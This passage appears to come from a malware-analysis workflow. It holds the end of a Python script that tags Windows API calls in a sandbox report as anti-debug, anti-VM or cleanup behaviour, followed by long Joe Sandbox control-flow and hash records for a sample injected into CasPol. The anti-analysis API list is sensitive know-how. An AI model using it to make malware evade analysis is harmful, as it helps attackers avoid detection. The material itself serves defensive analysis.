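    "GlobalMemoryStatusEx": "anti-vm (heuristic): physical RAM sizing",
    "GetSystemFirmwareTable": "anti-vm: firmware table query",
    "DeleteFileW": "cleanup: file deletion",
}

# "• Api.MODULE(args), ref: XXXXXXXX" -- the args parenthesis is optional in the report.
API_LINE = re.compile(
    r"^•\s*(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})",
    re.M,
)
SOURCE_LINE = re.compile(
    r"^•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)", re.M
)


def parse_records(text):
    """Split report text into per-function records; collect API refs and the dump they live in."""
    records = []
    for chunk in text.split("Control-flow Graph")[1:]:
        apis = [m.groupdict() for m in API_LINE.finditer(chunk)]
        src = SOURCE_LINE.search(chunk)
        records.append({
            "apis": apis,
            "dump": src.group("dump") if src else None,
            "offset": src.group("off") if src else None,
        })
    return records


def triage(records):
    """Map every call site to its tag; returns {tag: [(api, ref, dump), ...]}."""
    findings = defaultdict(list)
    for rec in records:
        for api in rec["apis"]:
            tag = API_TAGS.get(api["api"], "untagged")
            findings[tag].append((api["api"], api["ref"], rec["dump"]))
    return dict(findings)


def anti_analysis_refs(records):
    """Call-site addresses to patch or hook before re-running: anti-debug and anti-vm tags only."""
    return sorted(
        ref
        for tag, hits in triage(records).items()
        if tag.startswith(("anti-debug", "anti-vm"))
        for _, ref, _ in hits
    )


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for tag, hits in sorted(triage(recs).items()):
        for api, ref, dump in hits:
            print(f"{tag:45} {api:28} ref {ref}  ({dump})")
    print("patch/hook first:", anti_analysis_refs(recs))
```

The `ref` addresses are virtual addresses inside the dumped region, so they are only meaningful against the same dump (`Offset: 00CC0000`); the script keeps the dump name next to each hit for that reason. Extend `API_TAGS` with whatever the rest of the report surfaces (the header also flags firmware-table and WMI queries), but keep the "heuristic" label on anything that is not a direct anti-debug API, since GlobalMemoryStatusEx is also used by perfectly benign code.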

Control-flow Graph
Basic blocks: 2046 628fec3-628fefe, 2060 628ff01 (call ccef00), 2061 628ff01 (call ccef10), 2048 628ff07-628ff26, 2052 628ff2e-628ff58, 2055 628ff79, 2056 628ff5a-628ff77, 2057 628ff8b-628ff92
Edges: 2046->2060, 2046->2061, 2048->2052, 2052->2055, 2052->2056, 2055->2057, 2056->2057, 2060->2048, 2061->2048
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
• Opcode ID: bde22dbb0500a90ad5e4052edf88ea8acb6ad10fa3dfe72e1accb39ec05cf2ea
• Instruction ID: 37117c9aec1fc23daf5c1177d6022d45f63d31d215c6c6a8a844bb0019314a3c
• Opcode Fuzzy Hash: bde22dbb0500a90ad5e4052edf88ea8acb6ad10fa3dfe72e1accb39ec05cf2ea
• Instruction Fuzzy Hash: 75219F71B043509FDB549B78C819B6E7FF1AF49700F1544AAE94ADB391DB38AC00CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks: 2062 628fee0-628fefe, 2075 628ff01 (call ccef00), 2076 628ff01 (call ccef10), 2063 628ff07-628ff26, 2067 628ff2e-628ff58, 2070 628ff79, 2071 628ff5a-628ff77, 2072 628ff8b-628ff92
Edges: 2062->2075, 2062->2076, 2063->2067, 2067->2070, 2067->2071, 2070->2072, 2071->2072, 2075->2063, 2076->2063
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
• Opcode ID: 4d97d92b4880263501c6e1d7df9cd85af37fa1ce55048df8e48f908dd665f1cf
• Instruction ID: c2978f9d82787f3238136fe1f22573f6d8b0aa9a4c0b7e1c9d253cee765b1ad5
• Opcode Fuzzy Hash: 4d97d92b4880263501c6e1d7df9cd85af37fa1ce55048df8e48f908dd665f1cf
• Instruction Fuzzy Hash: DC114971B10224DFDB54AB78C805B6E7BF1AF48750F108469EA0AEB390DA799D01CB80
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2349 628cf38-628cf53 2350 628cf55-628cf58 2349->2350 2351 628cf5a-628cf69 2350->2351 2352 628cfa1-628cfa4 2350->2352 2353 628cf78-628cf84 2351->2353 2354 628cf6b-628cf70 2351->2354 2355 628cfed-628cff0 2352->2355 2356 628cfa6-628cfe8 2352->2356 2357 628cf8a-628cf9c 2353->2357 2358 628d955-628d98e 2353->2358 2354->2353 2359 628d039-628d03c 2355->2359 2360 628cff2-628d034 2355->2360 2356->2355 2357->2352 2369 628d990-628d993 2358->2369 2361 628d03e-628d080 2359->2361 2362 628d085-628d088 2359->2362 2360->2359 2361->2362 2364 628d08a-628d0a6 2362->2364 2365 628d0ab-628d0ae 2362->2365 2364->2365 2371 628d0b0-628d0f2 2365->2371 2372 628d0f7-628d0fa 2365->2372 2374 628d995-628d9c1 2369->2374 2375 628d9c6-628d9c9 2369->2375 2371->2372 2377 628d0fc-628d13e 2372->2377 2378 628d143-628d146 2372->2378 2374->2375 2381 628d9d8-628d9db 2375->2381 2382 628d9cb 2375->2382 2377->2378 2385 628d148-628d157 2378->2385 2386 628d18f-628d192 2378->2386 2391 628d9dd-628d9f9 2381->2391 2392 628d9fe-628da00 2381->2392 2609 628d9cb call 628daad 2382->2609 2610 628d9cb call 628dac0 2382->2610 2394 628d159-628d15e 2385->2394 2395 628d166-628d172 2385->2395 2389 628d1a1-628d1a4 2386->2389 2390 628d194-628d196 2386->2390 2402 628d1b3-628d1b6 2389->2402 2403 628d1a6-628d1a8 2389->2403 2400 628d19c 2390->2400 2401 628d421 2390->2401 2391->2392 2405 628da02 2392->2405 2406 628da07-628da0a 2392->2406 2394->2395 2395->2358 2397 628d178-628d18a 2395->2397 2397->2386 2399 628d9d1-628d9d3 2399->2381 2400->2389 2409 628d424-628d430 2401->2409 2413 628d1b8-628d1fa 2402->2413 2414 628d1ff-628d202 2402->2414 2411 628d1ae 2403->2411 2412 628d2df-628d2e8 2403->2412 2405->2406 2406->2369 2415 628da0c-628da1b 2406->2415 2409->2385 2422 628d436-628d723 
2409->2422 2411->2402 2418 628d2ea-628d2ef 2412->2418 2419 628d2f7-628d303 2412->2419 2413->2414 2414->2409 2416 628d208-628d20b 2414->2416 2433 628da1d-628da80 call 6286598 2415->2433 2434 628da82-628da97 2415->2434 2427 628d20d-628d24f 2416->2427 2428 628d254-628d257 2416->2428 2418->2419 2429 628d309-628d31d 2419->2429 2430 628d414-628d419 2419->2430 2562 628d729-628d72f 2422->2562 2563 628d94a-628d954 2422->2563 2427->2428 2436 628d259-628d29b 2428->2436 2437 628d2a0-628d2a3 2428->2437 2429->2401 2452 628d323-628d335 2429->2452 2430->2401 2433->2434 2461 628da98 2434->2461 2436->2437 2441 628d2ad-628d2b0 2437->2441 2442 628d2a5-628d2aa 2437->2442 2449 628d2cd-628d2cf 2441->2449 2450 628d2b2-628d2c8 2441->2450 2442->2441 2457 628d2d1 2449->2457 2458 628d2d6-628d2d9 2449->2458 2450->2449 2469 628d359-628d35b 2452->2469 2470 628d337-628d33d 2452->2470 2457->2458 2458->2350 2458->2412 2461->2461 2473 628d365-628d371 2469->2473 2474 628d33f 2470->2474 2475 628d341-628d34d 2470->2475 2488 628d37f 2473->2488 2489 628d373-628d37d 2473->2489 2480 628d34f-628d357 2474->2480 2475->2480 2480->2473 2492 628d384-628d386 2488->2492 2489->2492 2492->2401 2494 628d38c-628d3a8 call 6286598 2492->2494 2502 628d3aa-628d3af 2494->2502 2503 628d3b7-628d3c3 2494->2503 2502->2503 2503->2430 2506 628d3c5-628d412 2503->2506 2506->2401 2564 628d73e-628d747 2562->2564 2565 628d731-628d736 2562->2565 2564->2358 2566 628d74d-628d760 2564->2566 2565->2564 2568 628d93a-628d944 2566->2568 2569 628d766-628d76c 2566->2569 2568->2562 2568->2563 2570 628d77b-628d784 2569->2570 2571 628d76e-628d773 2569->2571 2570->2358 2572 628d78a-628d7ab 2570->2572 2571->2570 2575 628d7ba-628d7c3 2572->2575 2576 628d7ad-628d7b2 2572->2576 2575->2358 2577 628d7c9-628d7e6 2575->2577 2576->2575 2577->2568 2580 628d7ec-628d7f2 2577->2580 2580->2358 2581 628d7f8-628d811 2580->2581 2583 628d92d-628d934 2581->2583 2584 628d817-628d83e 2581->2584 2583->2568 2583->2580 2584->2358 2587 628d844-628d84e 2584->2587 
2587->2358 2588 628d854-628d86b 2587->2588 2590 628d87a-628d895 2588->2590 2591 628d86d-628d878 2588->2591 2590->2583 2596 628d89b-628d8b4 call 6286598 2590->2596 2591->2590 2600 628d8c3-628d8cc 2596->2600 2601 628d8b6-628d8bb 2596->2601 2600->2358 2602 628d8d2-628d926 2600->2602 2601->2600 2602->2583 2609->2399 2610->2399
Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d2de99b7568d71d56eb89b84ab61dc5644f75d57f4385788fd721dd87200b4b9
• Instruction ID: 7ef0481a0e5885c38c6d8e01c9d0bc884443af5521541733172a4d48d6c3f04c
• Opcode Fuzzy Hash: d2de99b7568d71d56eb89b84ab61dc5644f75d57f4385788fd721dd87200b4b9
• Instruction Fuzzy Hash: CA626030A102099FDB54EB68D8A0A5EB7F2FF85700B60C969D4069F399DB71EC46CBD1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1f696e4c909e8a6db3787c5e298f139650038250b85825fc80af2aaf2e50eb1
• Instruction ID: 86c1581f6d6d6f3932cac8ef70544990f062957d5c1acedc5c6036f0770ef031
• Opcode Fuzzy Hash: a1f696e4c909e8a6db3787c5e298f139650038250b85825fc80af2aaf2e50eb1
• Instruction Fuzzy Hash: 10E18330E212098FDB65EB68D89066EB7B2FF85300F54852AD805EB385DF75AC46CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f1333310c4ee8de5d35e53f071c2c030dcdf99aeac682ab5bbb4081311af3d0
• Instruction ID: 3c3ac45983e7af8c70e056ddecf86a1c057e9b516341ab969a5746a44ed0701d
• Opcode Fuzzy Hash: 2f1333310c4ee8de5d35e53f071c2c030dcdf99aeac682ab5bbb4081311af3d0
• Instruction Fuzzy Hash: 09A1B674F2110A8FEF64EB68C8917AEB7A2FB85311F648429E805E77D5CA34DC81CB51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41aa5ae1f8c56aba9230b9d5c943eeb9f0bd39ac85f2931663b604a88e78a2a4
• Instruction ID: 8d7e97d490f3eb77bb7f1b362af761c24d137f4372a56f2677c8c91045af26bf
• Opcode Fuzzy Hash: 41aa5ae1f8c56aba9230b9d5c943eeb9f0bd39ac85f2931663b604a88e78a2a4
• Instruction Fuzzy Hash: 8F919070B152458FDB54EBA8C8606AEBBF2BF89300F108469D805DB395EE74DC46CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d3ecfec7d545d69be50983a85f311a09c63c035521d787cc5ac39c4476a403a
• Instruction ID: d49a9ddc040ab031062671a0ca42a56692228d3399dda0afdc26e04d962bfc1d
• Opcode Fuzzy Hash: 1d3ecfec7d545d69be50983a85f311a09c63c035521d787cc5ac39c4476a403a
• Instruction Fuzzy Hash: B4915371F502099FDB64EB68D8507AE77F6BF88340F108565D809E7384EE70AD86CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b2aa50c9a3d5688c066bdfa1b0b1ced5622d1aad2fb40ceaf614e388cb221ff
• Instruction ID: f3652fd6f272fde745445dbb7963e10019db3b6e47f3f69ec9ce3271afc96f5f
• Opcode Fuzzy Hash: 9b2aa50c9a3d5688c066bdfa1b0b1ced5622d1aad2fb40ceaf614e388cb221ff
• Instruction Fuzzy Hash: 0B61C471F101114FDF51AA6ECC8066EBAD7AFC4620B254479D80ADB365DEB9EC02C7D1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d658a0e7cfc2bccdf74f0b7351237eb257c11dd683ca6b52dd6136b06e5899fa
• Instruction ID: 221929c725de90dbc46c6fec2887c6899a5a0b3d424c7fc4c42603ae678b5bbb
• Opcode Fuzzy Hash: d658a0e7cfc2bccdf74f0b7351237eb257c11dd683ca6b52dd6136b06e5899fa
• Instruction Fuzzy Hash: EF813F70B1120A9FDB54EBA9D45466EBBE2FB89300F208529E809DB385DE34EC46CB51
Uniqueness
Uniqueness Score: -1.00%


                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c821c0dda52b1c36c91eac615dbe3bca808ee50326932ccde89a1be96c9e949a
                                                                                                                                                                                                                                                    • Instruction ID: 7613320c60039ad1a4043239b927825f3824f6a11f4c33d2d26e7e96e3f513a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c821c0dda52b1c36c91eac615dbe3bca808ee50326932ccde89a1be96c9e949a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1512E71F501059FDB65EB68D8A0B6E77E6BF88340F108469D80ADB384DE71AC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: caf2d2a3d4428ab179701da0c0cbced88fbac59a957bbfd860e05df3f03ce2cd
                                                                                                                                                                                                                                                    • Instruction ID: fe85fc45bedf8a90624ad7f5e5a82f70fe7580dd6f7e6ff384e77412eff386f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caf2d2a3d4428ab179701da0c0cbced88fbac59a957bbfd860e05df3f03ce2cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB518271F102089FDB55AFA5C8557AEBBF2FF88700F24842AE505AB395DE749C068B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 15f84f028f7ce485d6a57e2067cf33da0fbea2ab23f47fccf9cc7537cfb6d75f
                                                                                                                                                                                                                                                    • Instruction ID: 1934b0e4c417da977f26e9a98398316ed01ea849adadeb8a5b7904f70839a8c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15f84f028f7ce485d6a57e2067cf33da0fbea2ab23f47fccf9cc7537cfb6d75f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6416C71E1130A8FDFA0DE99DC80AAFF7F6EB84210F10492AE516E7690D234E955CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4fd097b37232c7de65a077a23d3a92d47bc21ae96222ca9e833778624dcbacac
                                                                                                                                                                                                                                                    • Instruction ID: 66cf8dd68b43f010a59a81b1af905cf73ca83a49c5d9da6593cb0c02790a4d99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd097b37232c7de65a077a23d3a92d47bc21ae96222ca9e833778624dcbacac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4417370E1130A9FDB14EF65D89479EBBB6FF85340F208929E801E7281DB70994ACB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 112220b6f16b989501ee23ef35318b26984d8393958f07f0006cc4fbddc5f6b6
                                                                                                                                                                                                                                                    • Instruction ID: 494617834aa8aa9dd995a2228224c2e8b72601ac4e5624646d86cae94ed8e048
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 112220b6f16b989501ee23ef35318b26984d8393958f07f0006cc4fbddc5f6b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB416270E2120A9FDB54EF65C85479EBBB2BF85340F208829D806E72C0DBB19949CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b606a6a8e247c141c826b8ce2a8a6f04796509bc8cb1ce9cdb7e1c7b75a4f282
                                                                                                                                                                                                                                                    • Instruction ID: 8032ba8c23d971b57d9259b373114ceeabf1ab5921da28118db5dc56a34b6403
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b606a6a8e247c141c826b8ce2a8a6f04796509bc8cb1ce9cdb7e1c7b75a4f282
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D419371E212178FEFB49A69CC8077EF7B6FB85310F248926E915E7291CA34D841CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7d75fe4cced37bbbe9bd83aabf9a2a194859c7101d78333b111a1f97a9713fa2
                                                                                                                                                                                                                                                    • Instruction ID: d06ed92d6d3a00fcce93525784092e7d79bf0082fbf8928b7e58f66305c7da31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d75fe4cced37bbbe9bd83aabf9a2a194859c7101d78333b111a1f97a9713fa2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb811b17c127d998f1d76bd3c0b813e2765f68afefccf4ed87aaf783d7ef0d64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04215A7550D3C09FCB13CB64C990715BF71AB46214F29C5EBD8898F6A7C23A980ACB62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b34535d4acb28296de2a04788f636c87749fb6282e86846989bae87036428ab1
                                                                                                                                                                                                                                                    • Instruction ID: c0a7550cc0c84272bf6a93662923554707ca7a7ae37fde7de3622476b2216e21
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b34535d4acb28296de2a04788f636c87749fb6282e86846989bae87036428ab1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11E231A103098FCB60DFA5DCC1AAFFBB6FF89200F108929E155A3691D371A846CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bbab8c257ee193d658cfba653f66e5e1fc0efa91a53eb2ec5da836c61e03c6b5
                                                                                                                                                                                                                                                    • Instruction ID: 194484bd1a5fe57c49a3fb7560d608ab4c479410b2f57dc0d2bdb4bcd295a487
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbab8c257ee193d658cfba653f66e5e1fc0efa91a53eb2ec5da836c61e03c6b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C116136B201294FDB64EBBDCC146AEBBE6BBC8750B044539D806E7384DE65DC02C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0e08f22b6979d311d2994c0cdee71475a3047feff450c86528ccd2a3a27e6d04
                                                                                                                                                                                                                                                    • Instruction ID: 73d8dd7fccc09cc6f11f37f23b35700d63c0504ef8a973bba43c4acfd10c72b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e08f22b6979d311d2994c0cdee71475a3047feff450c86528ccd2a3a27e6d04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101D431B200111FDB64E6ADE85676FB7DADBC9B20F148439E50AC7385DE29DC038391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1159e26e0105ea4b254df6914b82a0bb1070fef8ff079c093abeb4b88d0a3ff2
                                                                                                                                                                                                                                                    • Instruction ID: edfe698fe74d826cb3d2a25c8f93475eb8e69595daa3334d0defc1ccde7cc4e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1159e26e0105ea4b254df6914b82a0bb1070fef8ff079c093abeb4b88d0a3ff2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28012431B251015FCB61A73C98A472E7BEAEBCA610F15857AE84ACB381DD24DC0783D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: aef0edecade98b76e1f264de1fd585a14d16c2079ec15b19644b3bf81b527476
                                                                                                                                                                                                                                                    • Instruction ID: e7e8dd6717d1d4dd95c6ceaab7b6c8088dc421c6d1777eb78464a8abb8c9a30a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aef0edecade98b76e1f264de1fd585a14d16c2079ec15b19644b3bf81b527476
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21C2B5D01219AFCB10DF9AD884BDEFFB4FB49310F50816AE918A7341C379A944CBA5
                                                                                                                                                                                                                                                    Uniqueness

